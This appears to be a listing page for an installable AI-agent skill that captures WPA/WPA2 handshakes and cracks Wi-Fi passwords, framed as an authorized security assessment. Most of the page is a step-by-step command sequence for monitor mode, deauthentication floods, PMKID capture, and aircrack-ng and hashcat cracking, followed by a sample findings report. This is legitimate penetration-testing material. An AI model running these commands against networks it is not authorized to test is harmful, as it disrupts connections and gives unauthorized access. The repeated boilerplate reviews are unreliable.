Captures WPA/WPA2 handshakes and performs offline password cracking using aircrack-ng, hashcat, and dictionary attacks during authorized wireless security assessments to evaluate passphrase strength and wireless network security posture.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionperforming-wifi-password-cracking-with-aircrackExecute the skills CLI command in your project's root directory to begin installation:
Fetches performing-wifi-password-cracking-with-aircrack from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate performing-wifi-password-cracking-with-aircrack. Access via /performing-wifi-password-cracking-with-aircrack in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
1
total installs
1
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
1
installs
1
this week
8.6K
stars
| name | performing-wifi-password-cracking-with-aircrack |
| description | 'Captures WPA/WPA2 handshakes and performs offline password cracking using aircrack-ng, hashcat, and dictionary attacks during authorized wireless security assessments to evaluate passphrase strength and wireless network security posture. ' |
| domain | cybersecurity |
| subdomain | network-security |
| tags | - network-security - wifi - aircrack-ng - wpa2 - wireless-security |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02 |
Do not use against wireless networks without explicit written authorization, for disrupting wireless communications, or for capturing handshakes of networks you do not have permission to test.
# Identify wireless interfaces
iwconfig
# or
iw dev
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Output: monitor mode enabled on wlan0mon
# Verify monitor mode
iwconfig wlan0mon
# Mode should show "Monitor"
# Alternatively, enable monitor mode manually
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Scan all channels for access points
sudo airodump-ng wlan0mon
# Output columns:
# BSSID PWR Beacons #Data CH ENC CIPHER AUTH ESSID
# AA:BB:CC:DD:EE:FF -45 120 35 6 WPA2 CCMP PSK TargetNetwork
# Identify the target network parameters:
# - BSSID (MAC address of the access point)
# - Channel number
# - Encryption type (WPA2-PSK is the target)
# - Connected clients (in the lower section)
# Focus scanning on the target channel
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w capture
# Method 1: Wait for a client to connect naturally
# Keep airodump-ng running and wait for "WPA handshake: AA:BB:CC:DD:EE:FF" message
sudo airodump-ng wlan0mon --channel 6 --bssid AA:BB:CC:DD:EE:FF -w handshake_capture
# Method 2: Deauthenticate a client to force reconnection (active)
# In a separate terminal, send deauth packets to a specific client
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# Or deauth all clients (broadcast)
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Method 3: Capture PMKID from the AP (no client needed)
# Using hcxdumptool
sudo hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_capture.pcapng \
--filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2
# Wait for "PMKID" message, then convert for hashcat
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_capture.pcapng
# Verify handshake was captured
aircrack-ng handshake_capture-01.cap
# Should show: "1 handshake" next to the target BSSID
# Alternative verification with cowpatty
cowpatty -r handshake_capture-01.cap -c
# Crack using rockyou wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake_capture-01.cap
# Use multiple wordlists
aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt \
-b AA:BB:CC:DD:EE:FF handshake_capture-01.cap
# Crack with a specific ESSID
aircrack-ng -w /usr/share/wordlists/rockyou.txt -e "TargetNetwork" handshake_capture-01.cap
# If successful, output shows:
# KEY FOUND! [ password123 ]
# Convert capture to hashcat format
# For handshake captures:
hcxpcapngtool -o hashcat_input.hc22000 handshake_capture-01.cap
# Or use aircrack-ng conversion
aircrack-ng handshake_capture-01.cap -j hashcat_input
# Dictionary attack with hashcat
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt
# Rule-based attack (transforms dictionary words)
hashcat -m 22000 hashcat_input.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Brute force 8-character numeric passwords
hashcat -m 22000 hashcat_input.hc22000 -a 3 ?d?d?d?d?d?d?d?d
# Combination attack (two wordlists combined)
hashcat -m 22000 hashcat_input.hc22000 -a 1 wordlist1.txt wordlist2.txt
# Mask attack for common patterns (Word + 4 digits)
hashcat -m 22000 hashcat_input.hc22000 -a 3 -1 ?l?u ?1?1?1?1?1?d?d?d?d
# For PMKID-specific hashes
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
# Show cracked password
hashcat -m 22000 hashcat_input.hc22000 --show
# Stop monitor mode
sudo airmon-ng stop wlan0mon
# Restart networking services
sudo systemctl restart NetworkManager
# Generate report
cat > wifi_assessment_report.txt << 'EOF'
WiFi Security Assessment Results
=================================
Target SSID: TargetNetwork
BSSID: AA:BB:CC:DD:EE:FF
Encryption: WPA2-PSK (CCMP)
Channel: 6
Handshake Capture: Successful (Method: Client deauthentication)
Cracking Result: PASSWORD FOUND
Password: [documented securely]
Time to Crack: 3 minutes 47 seconds (rockyou.txt, hashcat GPU)
Recommendation: Change to a passphrase of 15+ characters with mixed case,
numbers, and symbols, or migrate to WPA2/WPA3-Enterprise with 802.1X.
EOF
# Securely handle capture files (contain sensitive authentication material)
sha256sum handshake_capture-01.cap > evidence_hashes.txt
# Transfer to secure evidence storage per engagement agreement
| Term | Definition |
|---|---|
| 4-Way Handshake | WPA/WPA2 authentication exchange between client and AP that derives session keys from the PSK, captured for offline password cracking |
| PMKID | Pairwise Master Key Identifier included in the first EAPOL frame from the AP, allowing password cracking without capturing the full handshake or requiring a connected client |
| Monitor Mode | Wireless interface mode that captures all wireless frames on a channel without associating with any access point |
| Deauthentication Attack | Sending forged 802.11 management frames to disconnect a client from the AP, forcing a reconnection that generates a capturable handshake |
| PSK (Pre-Shared Key) | Static password used by all users to authenticate to a WPA/WPA2-Personal network, vulnerable to offline dictionary attacks |
| 802.1X/EAP | Enterprise wireless authentication using RADIUS that provides per-user credentials, eliminating the shared password vulnerability |
Context: A financial services company wants to assess the security of their wireless networks. They have three SSIDs: Corp-WiFi (WPA2-Enterprise for employees), Guest-WiFi (WPA2-PSK for visitors), and IoT-WiFi (WPA2-PSK for IoT devices). The assessment is authorized to test all three networks.
Approach:
Pitfalls:
## Wireless Security Assessment Report
**Assessment Date**: 2024-03-15
**Location**: Corporate Office, Building A
### Network Inventory
| SSID | BSSID | Encryption | Auth | Channel | Crackable |
|------|-------|------------|------|---------|-----------|
| Corp-WiFi | AA:BB:CC:11:22:33 | WPA2 | 802.1X | 36 | N/A (Enterprise) |
| Guest-WiFi | AA:BB:CC:44:55:66 | WPA2 | PSK | 6 | YES - 47 seconds |
| IoT-WiFi | AA:BB:CC:77:88:99 | WPA2 | PSK | 1 | YES - 12 seconds |
### Findings
**Finding 1: Weak Guest-WiFi Password (High)**
- Password: "Welcome2024!" (cracked via dictionary in 47 seconds)
- Present in rockyou.txt top 100,000 entries
- Shared among all visitors with no rotation policy
**Finding 2: Trivial IoT-WiFi Password (Critical)**
- Password: "iot12345" (cracked in 12 seconds)
- Default-pattern password providing access to IoT device network
- No network segmentation between IoT-WiFi and corporate resources
### Recommendations
1. Migrate Guest-WiFi to captive portal with per-session credentials
2. Change IoT-WiFi to 20+ character random passphrase with quarterly rotation
3. Implement network segmentation isolating IoT VLAN from corporate resources
4. Consider WPA3-SAE for PSK networks to prevent offline cracking
5. Enable 802.11w Protected Management Frames to prevent deauth attacks
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
Keeps context tight: performing-wifi-password-cracking-with-aircrack is the kind of skill you can hand to a new teammate without a long onboarding doc.
Registry listing for performing-wifi-password-cracking-with-aircrack matched our evaluation — installs cleanly and behaves as described in the markdown.
performing-wifi-password-cracking-with-aircrack fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Registry listing for performing-wifi-password-cracking-with-aircrack matched our evaluation — installs cleanly and behaves as described in the markdown.
performing-wifi-password-cracking-with-aircrack is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
Solid pick for teams standardizing on skills: performing-wifi-password-cracking-with-aircrack is focused, and the summary matches what you get after install.
performing-wifi-password-cracking-with-aircrack reduced setup friction for our internal harness; good balance of opinion and flexibility.
I recommend performing-wifi-password-cracking-with-aircrack for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
performing-wifi-password-cracking-with-aircrack reduced setup friction for our internal harness; good balance of opinion and flexibility.
performing-wifi-password-cracking-with-aircrack reduced setup friction for our internal harness; good balance of opinion and flexibility.
showing 1-10 of 44